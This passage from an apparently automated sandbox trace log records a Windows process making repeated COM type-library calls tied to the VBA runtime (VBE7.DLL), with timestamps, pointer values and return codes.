lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.551] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.551] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.551] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.551] IUnknown:Release (This=0x665ba50) returned 0xd [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.551] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.551] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.551] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.551] IUnknown:Release (This=0x665ba50) returned 0xd [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.551] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.552] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.552] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.552] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.552] IUnknown:Release (This=0x665ba50) returned 0xd [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.552] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.552] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.552] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.552] IUnknown:Release (This=0x665ba50) returned 0xd [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.552] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.552] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.552] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.552] IUnknown:Release (This=0x665ba50) returned 0xd [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.552] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.553] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.553] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.553] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.553] IUnknown:Release (This=0x665ba50) returned 0xd [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.553] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.553] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.553] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.553] IUnknown:Release (This=0x665ba50) returned 0xd [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.553] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf1b5b0, cb=0x3410) returned 0xaf1b5b0 [0069.553] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.553] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.553] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.553] IUnknown:Release (This=0x665ba50) returned 0xd [0069.553] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.554] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.554] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.554] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.554] IUnknown:Release (This=0x665ba50) returned 0xd [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.554] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.554] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.554] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.554] IUnknown:Release (This=0x665ba50) returned 0xd [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.554] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.554] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.554] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.554] IUnknown:Release (This=0x665ba50) returned 0xd [0069.554] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.555] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.555] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.555] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.555] IUnknown:Release (This=0x665ba50) returned 0xd [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.555] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.555] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.555] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.555] IUnknown:Release (This=0x665ba50) returned 0xd [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.555] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.555] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.555] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.555] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.555] IUnknown:Release (This=0x665ba50) returned 0xd [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.556] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.556] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.556] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.556] IUnknown:Release (This=0x665ba50) returned 0xd [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.556] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.556] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.556] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.556] IUnknown:Release (This=0x665ba50) returned 0xd [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.556] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | 